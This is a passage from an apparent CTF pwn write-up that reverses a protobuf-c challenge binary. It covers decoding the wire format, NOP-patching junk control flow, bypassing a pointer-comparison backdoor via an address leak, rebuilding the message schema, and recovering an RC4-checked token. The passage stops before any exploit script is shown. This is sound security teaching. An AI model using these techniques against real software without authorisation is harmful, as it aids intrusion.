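EXPECTED_WIRE_TYPE = {"INT32": 0, "STRING": 2, "BYTES": 2}


def read_varint(buf: bytes, pos: int) -> tuple[int, int]:
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if byte & 0x80 == 0:
            return value, pos
        shift += 7


def unpack(buf: bytes) -> dict:
    msg = {"id": 0, "name": "", "avatar": b""}    # defaults, like message_init
    pos = 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        number, wire_type = key >> 3, key & 0x7
        if wire_type == 0:
            raw, pos = read_varint(buf, pos)
        elif wire_type == 2:
            length, pos = read_varint(buf, pos)
            raw = buf[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"wire type {wire_type} not handled in this sketch")
        if number not in FIELDS:
            continue                               # sketch: drop unknown fields
        name, ftype = FIELDS[number]
        if wire_type != EXPECTED_WIRE_TYPE[ftype]:
            raise ValueError(f"field {number}: unexpected wire type {wire_type}")
        # same wire type 2, different interpretation depending on the table
        msg[name] = raw.decode("utf-8", "replace") if ftype == "STRING" else raw
    return msg


print(unpack(bytes.fromhex("08b90a120541787572611a030102ff")))
# {'id': 1337, 'name': 'Axura', 'avatar': b'\x01\x02\xff'}
```

The point to take away is that the type decision lives entirely in the table: swap the entries for fields 2 and 3 and the same bytes decode to different Python types.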

The name strings reside adjacently in .rodata:

pwn_protobuf_13

In conclusion, at runtime the generic parser (protobuf_c_message_unpack / protobuf_c_message_pack) uses exactly these:

  • descriptor->sizeof_message + message_init → how big the struct is and how to zero/default it.
  • descriptor->fields[i].type + descriptor->fields[i].offset + descriptor->fields[i].id → for field number N on the wire, with its wire type, write the decoded value into (uint8_t *)msg + offset and interpret it as INT32 / STRING / BYTES accordingly.

2.4.2.3 ProtobufCBinaryData

During reverse engineering, the protobuf side of a binary often appears as meaningless pointer arithmetic. In IDA, for instance, we might see:

IDA Decompiler
v9 = msg__msg__unpack(0, buf, ptr);
if ( !v9 )
    break;

switch ( *(_DWORD *)(v9 + 24) )       // choice
{
  case 0:
    create(*(_QWORD *)(v9 + 40),      // ??
           *(_QWORD *)(v9 + 48));     // ??
    break;

  case 1:
    delete(*(_QWORD *)(v9 + 32));     // ??
    break;

  case 2:
    edit(*(_QWORD *)(v9 + 32),        // ??
         *(_QWORD *)(v9 + 40),        // ??
         *(_QWORD *)(v9 + 48));       // ??
    break;

  case 3:
    show(*(_QWORD *)(v9 + 32));       // ??
    break;
}

We're not reversing this function in detail, but we do need to understand what structures are being referenced—especially when IDA highlights callsites like:

C
create(*(_QWORD *)(v9 + 40), *(_QWORD *)(v9 + 48));

Once we recognise v9 as a protobuf-c message, this pattern stops being random pointer salad. What it's really doing is:

  • 1st argument: a size or count that we control
  • 2nd argument: a heap pointer to a buffer we also control

That pair doesn't come from thin air. It comes from a protobuf bytes field (wire type 2), which protobuf-c materializes as a ProtobufCBinaryData:

C
struct ProtobufCBinaryData {
    size_t   len;   // decoded length from the wire
    uint8_t *data;  // heap pointer to the bytes
};

In many protobuf-pwn setups, those QWORD pairs in IDA (length and pointer) come straight from a bytes field parsed into a ProtobufCBinaryData, giving us a classic (len, ptr) primitive directly controlled by our crafted message.

3 PWN

Understanding protobuf's wire format and the corresponding C structures means the reversing phase becomes direct: the message fields appear in memory as predictable (len, ptr) pairs and fixed layouts, making protobuf-based binaries easy to analyze and control.

3.1 Custom Protobuf

I previously wrote a pwn analysis (link) covering UAF, FILE-style exploitation, VM behavior, and serialization bugs. That challenge used a protobuf-inspired VM interface — and once we understand how real protobuf encodes fields and structures, reversing these custom variants becomes straightforward.

3.2 Real Protobuf

Some binaries use the original protobuf parser directly. This challenge (download) is a clean example: standard protobuf-c message parsing, RC4 decryption, and an alphanumeric shellcode requirement.

3.2.1 Setup

The challenge provides a libprotobuf-c.so.1 file. After decompressing the archive, patch the target binary to link against the provided shared object:

Bash
# backup
cp protobuf_rc4_alpha pwn

# patch rpath to pwd
patchelf --set-rpath . ./pwn

Target is fully hardened:

$ checksec pwn
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled

The challenge does not ship with a libc, so we'll need to leak addresses to fingerprint libc, or craft an exploit path without relying on ret2libc.

Initial fuzzing with long input shows a memory leak:

pwn_protobuf_16

3.2.2 Reversing

3.2.2.1 Junk Instructions

IDA fails to decompile main due to junk control flow surrounding a suspicious call site:

pwn_protobuf_17

This is just an obfuscated unconditional jump implemented via two conditional branches. Both land at 0x1FA4 (i.e., loc_1FA1 + 3), where:

  • a NOP instruction (0x90) sits at 0x1FA4
  • the following 0x48 at 0x1FA5 is the REX.W prefix for lea, turning the apparent lea eax into lea rax.

NOP out the junk instructions in between so IDA can follow the flow. After a "UDP" patch, IDA renders the disassembly correctly:

pwn_protobuf_18

Once patched, press "P" on the int main() region to recover the decompiled code. It still ends with a pointless return sub_1FFF();:

pwn_protobuf_19

sub_1FFF is just jmp loc_1F45. The lea / jmp rax pair in front of it is an indirect tail-jump plus one extra layer of indirection, i.e. more junk obfuscation.

So we just need to replace:

IDA
.text:0000000000001FEE 48 8D 05 0A 00                 lea     rax, sub_1FFF
.text:0000000000001FF5 FF E0                          jmp     rax

With a single:

ASM
jmp loc_1F45

And pad the remaining bytes with NOPs.
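
As a rough sketch of that patch, the replacement bytes can be computed by hand. It assumes the lea is the usual 7-byte RIP-relative encoding (the listing truncates its opcode bytes), so the lea / jmp rax pair spans 9 bytes starting at 0x1FEE. The helper name make_jmp_patch is made up for illustration.

```python
import struct

def make_jmp_patch(src: int, dst: int, span: int) -> bytes:
    """Encode `jmp rel32` at src targeting dst, NOP-padded to span bytes."""
    rel = dst - (src + 5)              # rel32 is relative to the end of the 5-byte jmp
    patch = b"\xe9" + struct.pack("<i", rel)
    if len(patch) > span:
        raise ValueError("span too small for a near jmp")
    return patch + b"\x90" * (span - len(patch))

# Assumption: lea (7 bytes at 0x1FEE) + jmp rax (2 bytes at 0x1FF5) = 9 bytes
patch = make_jmp_patch(src=0x1FEE, dst=0x1F45, span=9)
print(patch.hex(" "))
```

A short jmp (EB rel8) would not reach here, since the target is more than 128 bytes behind the patch site, hence the 5-byte near form.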

Now the disassembly is stable and clean:

pwn_protobuf_20

3.2.2.2 Backdoor

From the above code:

C
__isoc99_scanf("%llx", v3);
if ( (char *)v3[0] == "yes" )

This is NOT a string comparison but a pointer equality check: the value we enter as hex must equal the address of the "yes" literal itself. In other words, this is a deliberate backdoor:

"If you know the address of "yes", you get the prize."

And we do. It's the .rodata string that the binary is comparing against:

IDA
.rodata:0000000000003041 79 65 73 00    aYes            db 'yes',0   

But to reach that, we first need to leak the .text base address.

3.2.2.3 Leak Text Base

The binary offers a straightforward leak:

C
__isoc99_scanf("%d", &dword_5008);
if ( dword_5008 <= 255 )
  printf("%p", &dword_5008);

By supplying any input ≤ 255, we trigger the leak of a global .data address:

IDA
.data:0000000000005008 0A 00 00 00    dword_5008      dd 0Ah  
pwn_protobuf_22

From there, we can calculate the offset to .rodata, where the "yes" string resides.
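
A minimal sketch of that arithmetic, using the two offsets from the IDA listings (0x5008 for dword_5008, 0x3041 for "yes"). The leaked value below is a hypothetical example, and resolve_yes is an illustrative helper name.

```python
DATA_LEAK_OFFSET = 0x5008   # offset of dword_5008 in .data (from the IDA listing)
YES_OFFSET = 0x3041         # offset of the "yes" literal in .rodata

def resolve_yes(leak: int) -> tuple:
    """Turn the leaked &dword_5008 into (PIE base, address of "yes")."""
    base = leak - DATA_LEAK_OFFSET
    if base & 0xFFF:
        raise ValueError("leak does not look like &dword_5008")
    return base, base + YES_OFFSET

leak = 0x55D1C0A05008       # hypothetical value printed by the %p leak
base, yes_addr = resolve_yes(leak)
print(hex(base), hex(yes_addr))
print(f"{yes_addr:x}")      # hex digits to feed into scanf("%llx")
```

The page-alignment check is only a sanity guard: a PIE base should end in 0x000, so a failure usually means the wrong bytes were parsed as the leak.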

3.2.2.4 Protobuf

Once the "yes" comparison is bypassed, execution enters backdoor sub_1D96, which at first looks noisy:

pwn_protobuf_21

It reads 0x100 bytes and calls a validation routine:

C
__int64 __fastcall sub_218D(__int64 a1, __int64 a2, __int64 a3)
{
  return protobuf_c_message_unpack(&unk_4C40, a1, a2, a3);
}

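This is just a call to protobuf_c_message_unpack with a hardcoded ProtobufCMessageDescriptor at &unk_4C40, which is used to parse our input. In protobuf-c's prototype the remaining arguments are the allocator, the input length, and the input buffer, so a1, a2, and a3 map to those in order. The parsed result is stored in the global pointer qword_5058.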

Earlier in this writeup, we already dissected how descriptors like this define the schema at runtime. The &unk_4C40 holds the message descriptor (ProtobufCMessageDescriptor):

IDA
.data.rel.ro:0000000000004C40 F9             unk_4C40        db 0F9h                 ; DATA XREF: sub_2004+5B↑o
.data.rel.ro:0000000000004C40                                                        ; sub_206C+17↑o ...
.data.rel.ro:0000000000004C41 EE                             db 0EEh
.data.rel.ro:0000000000004C42 AA                             db 0AAh
.data.rel.ro:0000000000004C43 28                             db  28h ; (
.data.rel.ro:0000000000004C44 00                             db    0
.data.rel.ro:0000000000004C45 00                             db    0
.data.rel.ro:0000000000004C46 00                             db    0
.data.rel.ro:0000000000004C47 00                             db    0
.data.rel.ro:0000000000004C48 30 31 00 00 00…                dq offset aGiaoMsgiao   ; "giao.msgiao"
.data.rel.ro:0000000000004C50 3C 31 00 00 00…                dq offset aMsgiao       ; "Msgiao"
.data.rel.ro:0000000000004C58 43 31 00 00 00…                dq offset aGiaoMsgiao_0 ; "Giao__Msgiao"
.data.rel.ro:0000000000004C60 50 31 00 00 00…                dq offset aGiao         ; "giao"
.data.rel.ro:0000000000004C68 48                             db  48h ; H
.data.rel.ro:0000000000004C69 00                             db    0
.data.rel.ro:0000000000004C6A 00                             db    0
.data.rel.ro:0000000000004C6B 00                             db    0
.data.rel.ro:0000000000004C6C 00                             db    0
.data.rel.ro:0000000000004C6D 00                             db    0
.data.rel.ro:0000000000004C6E 00                             db    0
.data.rel.ro:0000000000004C6F 00                             db    0
.data.rel.ro:0000000000004C70 04                             db    4
.data.rel.ro:0000000000004C71 00                             db    0
.data.rel.ro:0000000000004C72 00                             db    0
.data.rel.ro:0000000000004C73 00                             db    0
.data.rel.ro:0000000000004C74 00                             db    0
.data.rel.ro:0000000000004C75 00                             db    0
.data.rel.ro:0000000000004C76 00                             db    0
.data.rel.ro:0000000000004C77 00                             db    0
.data.rel.ro:0000000000004C78 20 4B 00 00 00…                dq offset off_4B20      ; "giaoid"
.data.rel.ro:0000000000004C80 10 31 00 00 00…                dq offset unk_3110
.data.rel.ro:0000000000004C88 01                             db    1
.data.rel.ro:0000000000004C89 00                             db    0
.data.rel.ro:0000000000004C8A 00                             db    0
.data.rel.ro:0000000000004C8B 00                             db    0
.data.rel.ro:0000000000004C8C 00                             db    0
.data.rel.ro:0000000000004C8D 00                             db    0
.data.rel.ro:0000000000004C8E 00                             db    0
.data.rel.ro:0000000000004C8F 00                             db    0
.data.rel.ro:0000000000004C90 20 31 00 00 00…                dq offset unk_3120
.data.rel.ro:0000000000004C98 04 20 00 00 00…                dq offset sub_2004
.data.rel.ro:0000000000004CA0 00 00 00 00 00…                align 40h
.data.rel.ro:0000000000004CC0 40 4C 00 00 00…                dq offset unk_4C40
...

Paired with:

IDA
.rodata:0000000000003110 unk_3110 db   2,0,0,0,  0,0,0,0,  1,0,0,0,  3,0,0,0
.rodata:0000000000003120 unk_3120 db   1,0,0,0,  0,0,0,0,  0,0,0,0,  4,0,0,0

.rodata:0000000000003130 aGiaoMsgiao     db 'giao.msgiao',0
.rodata:000000000000313C aMsgiao         db 'Msgiao',0
.rodata:0000000000003143 aGiaoMsgiao_0   db 'Giao__Msgiao',0
.rodata:0000000000003150 aGiao           db 'giao',0
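
The same dump can be decoded programmatically. The sketch below assumes the 64-bit ProtobufCMessageDescriptor layout from protobuf-c's header (magic, four name pointers, sizeof_message, n_fields, fields, fields_sorted_by_name, n_field_ranges, field_ranges, message_init) and skips the trailing reserved pointers. The raw bytes are rebuilt from the values in the listing rather than read from the binary.

```python
import struct

# 64-bit layout assumed: uint32 magic + pad, 4 name pointers, size_t sizeof_message,
# unsigned n_fields + pad, 2 pointers, unsigned n_field_ranges + pad, 2 pointers.
MSG_DESC = struct.Struct("<I4x5QI4x2QI4x2Q")
MSG_DESC_MAGIC = 0x28AAEEF9  # PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC

FIELDS = ("magic", "name", "short_name", "c_name", "package_name",
          "sizeof_message", "n_fields", "fields", "fields_sorted_by_name",
          "n_field_ranges", "field_ranges", "message_init")

def parse_message_descriptor(raw: bytes) -> dict:
    desc = dict(zip(FIELDS, MSG_DESC.unpack_from(raw)))
    if desc["magic"] != MSG_DESC_MAGIC:
        raise ValueError("not a ProtobufCMessageDescriptor")
    return desc

# Bytes at 0x4C40..0x4C9F rebuilt from the listing above
raw = MSG_DESC.pack(0x28AAEEF9, 0x3130, 0x313C, 0x3143, 0x3150,
                    0x48, 4, 0x4B20, 0x3110, 1, 0x3120, 0x2004)
desc = parse_message_descriptor(raw)
for key, value in desc.items():
    print(f"{key:22} {value:#x}")
```

Read this way, the message is 0x48 bytes with 4 fields at 0x4B20. unk_3110 is the name-sorted index table (2, 0, 1, 3), and unk_3120 is a single field range starting at tag 1 followed by its terminator.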

off_4B20 holds the C array of ProtobufCFieldDescriptor entries:

IDA
.data.rel.ro:0000000000004B20 E6 30 00 00 00 off_4B20        dq offset aGiaoid       ; DATA XREF: .data.rel.ro:0000000000004C78↓o
.data.rel.ro:0000000000004B20 00 00 00                                               ; "giaoid"
.data.rel.ro:0000000000004B28 01                             db    1
.data.rel.ro:0000000000004B29 00                             db    0
.data.rel.ro:0000000000004B2A 00                             db    0
...
.data.rel.ro:0000000000004B68 ED 30 00 00 00…                dq offset aGiaosize     ; "giaosize"
.data.rel.ro:0000000000004B70 02                             db    2
.data.rel.ro:0000000000004B71 00                             db    0
.data.rel.ro:0000000000004B72 00                             db    0
...
.data.rel.ro:0000000000004BB0 F6 30 00 00 00…                dq offset aGiaocontent  ; "giaocontent"
.data.rel.ro:0000000000004BB8 03                             db    3
.data.rel.ro:0000000000004BB9 00                             db    0
.data.rel.ro:0000000000004BBA 00                             db    0
...
.data.rel.ro:0000000000004BF8 02 31 00 00 00…                dq offset aGiaotoken    ; "giaotoken"
.data.rel.ro:0000000000004C00 04                             db    4
.data.rel.ro:0000000000004C01 00                             db    0
...
.data.rel.ro:0000000000004C3F 00                             db    0

We can regenerate the .proto definition using automated tooling, or craft one ourselves once we've extracted the full message-descriptor data from memory. For the sake of practice, we'll continue with a manual reconstruction.

The dump shows 4 descriptors back-to-back, each 0x48 bytes apart:

  • 0x4B20 – field 1: giaoid
  • 0x4B68 – field 2: giaosize
  • 0x4BB0 – field 3: giaocontent
  • 0x4BF8 – field 4: giaotoken

Take a closer look at the first one:

IDA
.data.rel.ro:0000000000004B20 off_4B20 dq offset aGiaoid      ; name = "giaoid"
.data.rel.ro:0000000000004B28          dd 1                   ; id
.data.rel.ro:0000000000004B2C          dd 3                   ; label
.data.rel.ro:0000000000004B30          dd 3                   ; type
.data.rel.ro:0000000000004B34          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004B38          dd 18h                 ; offset
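.data.rel.ro:0000000000004B3C          dd 0                   ; (alignment padding)
.data.rel.ro:0000000000004B40          dq 0                   ; descriptor
.data.rel.ro:0000000000004B48          dq 0                   ; default_value
.data.rel.ro:0000000000004B50          dd 0                   ; flags
.data.rel.ro:0000000000004B54          dd 0                   ; reserved_flags
.data.rel.ro:0000000000004B58          dq 0                   ; reserved2
.data.rel.ro:0000000000004B60          dq 0                   ; reserved3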

label = 3 → PROTOBUF_C_LABEL_NONE (proto3-style "no label", effectively optional, no separate has_*):

C
typedef enum {
    PROTOBUF_C_LABEL_REQUIRED = 0,
    PROTOBUF_C_LABEL_OPTIONAL = 1,
    PROTOBUF_C_LABEL_REPEATED = 2,
    PROTOBUF_C_LABEL_NONE     = 3
} ProtobufCLabel;

type = 3 → PROTOBUF_C_TYPE_INT64:

C
typedef enum {
    PROTOBUF_C_TYPE_INT32    = 0,
    PROTOBUF_C_TYPE_SINT32   = 1,
    PROTOBUF_C_TYPE_SFIXED32 = 2,
    PROTOBUF_C_TYPE_INT64    = 3,
    // ...
    PROTOBUF_C_TYPE_BYTES    = 15,
    PROTOBUF_C_TYPE_MESSAGE  = 16
} ProtobufCType;

So this means:

Field 1 – at 0x4B20:

  • name: giaoid
  • tag number: 1
  • label: NONE (proto3-ish optional)
  • type: int64
  • C struct offset: 0x18

Field 2 – at 0x4B68:

IDA
.data.rel.ro:0000000000004B68          dq offset aGiaosize    ; name = "giaosize"
.data.rel.ro:0000000000004B70          dd 2                   ; id
.data.rel.ro:0000000000004B74          dd 3                   ; label
.data.rel.ro:0000000000004B78          dd 3                   ; type
.data.rel.ro:0000000000004B7C          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004B80          dd 20h                 ; offset
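.data.rel.ro:0000000000004B84          dd 0                   ; (alignment padding)
.data.rel.ro:0000000000004B88          dq 0                   ; descriptor
.data.rel.ro:0000000000004B90          dq 0                   ; default_value
.data.rel.ro:0000000000004B98          dd 0                   ; flags
.data.rel.ro:0000000000004B9C          dd 0                   ; reserved_flags
.data.rel.ro:0000000000004BA0          dq 0                   ; reserved2
.data.rel.ro:0000000000004BA8          dq 0                   ; reserved3

  • name: giaosize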
  • tag: 2
  • label: NONE
  • type: int64
  • offset: 0x20

Field 3 – at 0x4BB0:

IDA
.data.rel.ro:0000000000004BB0          dq offset aGiaocontent ; name = "giaocontent"
.data.rel.ro:0000000000004BB8          dd 3                   ; id
.data.rel.ro:0000000000004BBC          dd 3                   ; label
.data.rel.ro:0000000000004BC0          dd 0Fh                 ; type
.data.rel.ro:0000000000004BC4          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004BC8          dd 28h                 ; offset
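.data.rel.ro:0000000000004BCC          dd 0                   ; (alignment padding)
.data.rel.ro:0000000000004BD0          dq 0                   ; descriptor
.data.rel.ro:0000000000004BD8          dq 0                   ; default_value
.data.rel.ro:0000000000004BE0          dd 0                   ; flags
.data.rel.ro:0000000000004BE4          dd 0                   ; reserved_flags
.data.rel.ro:0000000000004BE8          dq 0                   ; reserved2
.data.rel.ro:0000000000004BF0          dq 0                   ; reserved3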

type = 0x0F → PROTOBUF_C_TYPE_BYTES (15)

  • name: giaocontent
  • tag: 3
  • label: NONE
  • type: bytes
  • offset: 0x28

Field 4 – at 0x4BF8:

IDA
.data.rel.ro:0000000000004BF8          dq offset aGiaotoken   ; name = "giaotoken"
.data.rel.ro:0000000000004C00          dd 4                   ; id
.data.rel.ro:0000000000004C04          dd 3                   ; label
.data.rel.ro:0000000000004C08          dd 0Fh                 ; type
.data.rel.ro:0000000000004C0C          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004C10          dd 38h                 ; offset
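.data.rel.ro:0000000000004C14          dd 0                   ; (alignment padding)
.data.rel.ro:0000000000004C18          dq 0                   ; descriptor
.data.rel.ro:0000000000004C20          dq 0                   ; default_value
.data.rel.ro:0000000000004C28          dd 0                   ; flags
.data.rel.ro:0000000000004C2C          dd 0                   ; reserved_flags
.data.rel.ro:0000000000004C30          dq 0                   ; reserved2
.data.rel.ro:0000000000004C38          dq 0                   ; reserved3

  • name: giaotoken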
  • tag: 4
  • label: NONE
  • type: bytes
  • offset: 0x38
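
The four entries can also be decoded in one pass instead of by eye. This is a sketch under the assumption that the binary uses the stock 64-bit ProtobufCFieldDescriptor layout from protobuf-c's header (0x48 bytes per entry). The blob is rebuilt from the values above rather than read from the ELF, and the names dictionary stands in for resolving the name pointers.

```python
import struct

# Assumed 64-bit ProtobufCFieldDescriptor layout (0x48 bytes):
# name*, id, label, type, quantifier_offset, offset, pad,
# descriptor*, default_value*, flags, reserved_flags, reserved2*, reserved3*
FIELD_DESC = struct.Struct("<Q5I4x2Q2I2Q")

LABELS = {0: "required", 1: "optional", 2: "repeated", 3: "none"}
TYPES = ["int32", "sint32", "sfixed32", "int64", "sint64", "sfixed64",
         "uint32", "fixed32", "uint64", "fixed64", "float", "double",
         "bool", "enum", "string", "bytes", "message"]

def parse_fields(raw: bytes, names: dict) -> list:
    fields = []
    for rec in FIELD_DESC.iter_unpack(raw):
        name_ptr, fid, label, ftype, _quant, offset = rec[:6]
        fields.append((names[name_ptr], fid, LABELS[label], TYPES[ftype], offset))
    return fields

# Name pointers and values taken from the four entries above
names = {0x30E6: "giaoid", 0x30ED: "giaosize",
         0x30F6: "giaocontent", 0x3102: "giaotoken"}
rows = [(0x30E6, 1, 3, 3, 0, 0x18), (0x30ED, 2, 3, 3, 0, 0x20),
        (0x30F6, 3, 3, 15, 0, 0x28), (0x3102, 4, 3, 15, 0, 0x38)]
raw = b"".join(FIELD_DESC.pack(*row, 0, 0, 0, 0, 0, 0) for row in rows)

for name, fid, label, ftype, offset in parse_fields(raw, names):
    print(f"{ftype:6} {name} = {fid};  // label={label}, struct offset {offset:#x}")
```

Each printed line is already close to a .proto field declaration, which makes the manual reconstruction below mostly a copy-paste job.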

From the message descriptor chunk shown before:

  • full name: "giao.msgiao"
  • short C name: "Msgiao"
  • C type name: "Giao__Msgiao"
  • package: "giao"

So the proto message looks like this in high-level form:

proto
syntax = "proto3";

package giao;

message Msgiao {
    int64  giaoid      = 1;
    int64  giaosize    = 2;
    bytes  giaocontent = 3;
    bytes  giaotoken   = 4;
}

We must accurately pair each field’s tag and wire type with the reversed ProtobufCFieldDescriptor entries, while the name only needs to align with what appears in the source or in the exploit script. The package name (giao) and message type name (Msgiao) are arbitrary — they can be renamed or replaced entirely.

We can choose to define the schema using either the legacy proto2 / proto3 syntax, or adopt the newer edition = ... format introduced in Protobuf Editions, applying the appropriate grammar.

Once we reconstruct the pwn.proto file, generate Python bindings with:

Bash
protoc --python_out=. pwn.proto

These bindings can then be imported directly into our exploit script for message crafting.
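
When protoc is not available, the message is simple enough to encode by hand. The following is a minimal sketch of the wire format for this schema only (varint fields 1 and 2, length-delimited fields 3 and 4). The helper names are illustrative, and unlike a real proto3 serializer it does not omit default (zero or empty) values.

```python
def varint(n: int) -> bytes:
    """Base-128 varint for a non-negative integer."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)   # more bytes follow
        else:
            out.append(byte)
            return bytes(out)

def int_field(num: int, value: int) -> bytes:
    # wire type 0 (VARINT); negative int64 values are sent as 64-bit two's complement
    return varint(num << 3 | 0) + varint(value & 0xFFFFFFFFFFFFFFFF)

def bytes_field(num: int, data: bytes) -> bytes:
    # wire type 2 (LEN): tag, length, raw bytes
    return varint(num << 3 | 2) + varint(len(data)) + data

def build_msgiao(giaoid: int, giaosize: int, content: bytes, token: bytes) -> bytes:
    return (int_field(1, giaoid) + int_field(2, giaosize)
            + bytes_field(3, content) + bytes_field(4, token))

payload = build_msgiao(0x114514, 0x415411, b"AAAA", b"BBBB")
print(payload.hex())
```

This also shows why only tag numbers and wire types matter to the parser: field names never appear on the wire.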

3.2.2.4 C Structure Recovery

Given the offsets:

  • 0x18 → giaoid
  • 0x20 → giaosize
  • 0x28 → giaocontent
  • 0x38 → giaotoken

…and knowing protobuf-c always starts messages with a ProtobufCMessage base, we can reverse the layout as:

IDA local type
struct ProtobufCMessage {
  void *descriptor;              
  unsigned __int64 n_unknown_fields; 
  void *unknown_fields;          
};                               

struct ProtobufCBinaryData {
  unsigned __int64 len;          
  char *data;                    
};                               

struct Msgiao {
    ProtobufCMessage    base;          // at 0x00, size 0x18 on 64-bit (descriptor ptr + n_unknown + unknown_fields)
    int64_t             giaoid;        // at 0x18
    int64_t             giaosize;      // at 0x20
    ProtobufCBinaryData giaocontent;   // at 0x28  (struct { size_t len; uint8_t *data; })
    ProtobufCBinaryData giaotoken;     // at 0x38
};
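
As a quick sanity check, the recovered layout can be mirrored with ctypes and compared against the descriptor offsets. This is only a sketch: pointers and size_t are modeled as fixed 8-byte integers so the result does not depend on the host, and n_unknown_fields is widened to 8 bytes to match the IDA type above.

```python
import ctypes

class ProtobufCMessage(ctypes.Structure):
    _fields_ = [("descriptor", ctypes.c_uint64),        # pointer, modeled as 8 bytes
                ("n_unknown_fields", ctypes.c_uint64),  # unsigned + padding in protobuf-c
                ("unknown_fields", ctypes.c_uint64)]

class ProtobufCBinaryData(ctypes.Structure):
    _fields_ = [("len", ctypes.c_uint64), ("data", ctypes.c_uint64)]

class Msgiao(ctypes.Structure):
    _fields_ = [("base", ProtobufCMessage),
                ("giaoid", ctypes.c_int64),
                ("giaosize", ctypes.c_int64),
                ("giaocontent", ProtobufCBinaryData),
                ("giaotoken", ProtobufCBinaryData)]

for name in ("giaoid", "giaosize", "giaocontent", "giaotoken"):
    print(f"{name:12} {getattr(Msgiao, name).offset:#x}")
print("sizeof", hex(ctypes.sizeof(Msgiao)))
```

The total size should come out as 0x48, matching the sizeof_message value stored in the message descriptor.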

Import the generated types into IDA as local structures (Shift + F1). Then press "Y" on the global pointer qword_5058 — which holds the parsed protobuf message — and set its type to Msgiao *.

With that in place, the decompiled backdoor function sub_1D96 becomes immediately readable:

pwn_protobuf_23

The rest is trivial.

3.2.2.5 Custom RC4 Encryption

To reach arbitrary code execution, we must bypass a check on the giaotoken field — gated by a custom RC4-based function:

C
_BOOL8 __fastcall my_rc4(const char *input_token)
{
  size_t v1; // rax
  int i; // [rsp+18h] [rbp-258h]
  int len_s; // [rsp+1Ch] [rbp-254h]
  char s[8]; // [rsp+20h] [rbp-250h] BYREF
  unsigned __int64 v6; // [rsp+28h] [rbp-248h]
  unsigned __int64 v7; // [rsp+30h] [rbp-240h]
  unsigned __int64 v8; // [rsp+38h] [rbp-238h]
  int v9; // [rsp+40h] [rbp-230h]
  _QWORD key[32]; // [rsp+50h] [rbp-220h] BYREF
  _WORD state[12]; // [rsp+150h] [rbp-120h] BYREF
  __int64 v12; // [rsp+168h] [rbp-108h]
  __int64 v13; // [rsp+170h] [rbp-100h]
  __int64 v14; // [rsp+178h] [rbp-F8h]
  __int64 v15; // [rsp+180h] [rbp-F0h]
  __int64 v16; // [rsp+188h] [rbp-E8h]
  __int64 v17; // [rsp+190h] [rbp-E0h]
  __int64 v18; // [rsp+198h] [rbp-D8h]
  __int64 v19; // [rsp+1A0h] [rbp-D0h]
  __int64 v20; // [rsp+1A8h] [rbp-C8h]
  __int64 v21; // [rsp+1B0h] [rbp-C0h]
  __int64 v22; // [rsp+1B8h] [rbp-B8h]
  __int64 v23; // [rsp+1C0h] [rbp-B0h]
  __int64 v24; // [rsp+1C8h] [rbp-A8h]
  __int64 v25; // [rsp+1D0h] [rbp-A0h]
  __int64 v26; // [rsp+1D8h] [rbp-98h]
  __int64 v27; // [rsp+1E0h] [rbp-90h]
  __int64 v28; // [rsp+1E8h] [rbp-88h]
  __int64 v29; // [rsp+1F0h] [rbp-80h]
  __int64 v30; // [rsp+1F8h] [rbp-78h]
  __int64 v31; // [rsp+200h] [rbp-70h]
  __int64 v32; // [rsp+208h] [rbp-68h]
  __int64 v33; // [rsp+210h] [rbp-60h]
  __int64 v34; // [rsp+218h] [rbp-58h]
  __int64 v35; // [rsp+220h] [rbp-50h]
  __int64 v36; // [rsp+228h] [rbp-48h]
  __int64 v37; // [rsp+230h] [rbp-40h]
  __int64 v38; // [rsp+238h] [rbp-38h]
  __int64 v39; // [rsp+240h] [rbp-30h]
  __int64 v40; // [rsp+248h] [rbp-28h]
  unsigned __int64 v41; // [rsp+258h] [rbp-18h]

  v41 = __readfsqword(0x28u);
  memset(key, 0, sizeof(key));
  strcpy((char *)state, "114514giaogiaogiao99");
  HIBYTE(state[10]) = 0;
  state[11] = 0;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 0;
  v16 = 0;
  v17 = 0;
  v18 = 0;
  v19 = 0;
  v20 = 0;
  v21 = 0;
  v22 = 0;
  v23 = 0;
  v24 = 0;
  v25 = 0;
  v26 = 0;
  v27 = 0;
  v28 = 0;
  v29 = 0;
  v30 = 0;
  v31 = 0;
  v32 = 0;
  v33 = 0;
  v34 = 0;
  v35 = 0;
  v36 = 0;
  v37 = 0;
  v38 = 0;
  v39 = 0;
  v40 = 0;
  *(_QWORD *)s = 0xB95FA87BA6AF366ALL;
  v6 = 0x918D1C0CC7837D63LL;
  v7 = 0xF877F9B36B6EF2D3LL;
  v8 = 0x8EFDECFCE888E2BFLL;
  v9 = 0x40FE92FD;
  len_s = strlen(s);
  v1 = strlen((const char *)state);
  rc4_init((__int64)key, (__int64)state, v1);   // KSA
  rc4_enc((__int64)key, (__int64)input_token, len_s, (__int64)state);
  for ( i = 0; i < strlen(input_token); ++i )
    ;
  return strcmp(input_token, s) == 0;
}

At first glance, it's unmistakably one of those classic RC4 password-check routines buried inside a cursed decompilation artifact.

The encryption logic unfolds as follows:

C
strcpy((char *)state, "114514giaogiaogiao99");
v1 = strlen(state);
rc4_init(key, state, v1);
rc4_enc(key, input_token, len_s, state);
return strcmp(input_token, s) == 0;

Breakdown of the flow:

  1. Copies a fixed key string "114514giaogiaogiao99" into state.
  2. Initializes the RC4 state using rc4_init().
  3. Encrypts the input token in place using rc4_enc().
  4. Compares the result against a hardcoded ciphertext buffer s.

Stream Cipher Logic

This is RC4, a symmetric stream cipher, and its state is rebuilt from the same fixed key on every run, so the keystream never changes:

  • cipher = plaintext ⊕ keystream
  • plaintext = cipher ⊕ keystream

Which means:

We don't need to dissect the routine itself. All that matters is extracting the keystream, then XOR-ing it with the fixed ciphertext to recover the expected giaotoken. The RC4 key 114514giaogiaogiao99 is irrelevant for our purposes — it's fixed, deterministic, and contributes no additional mystery.

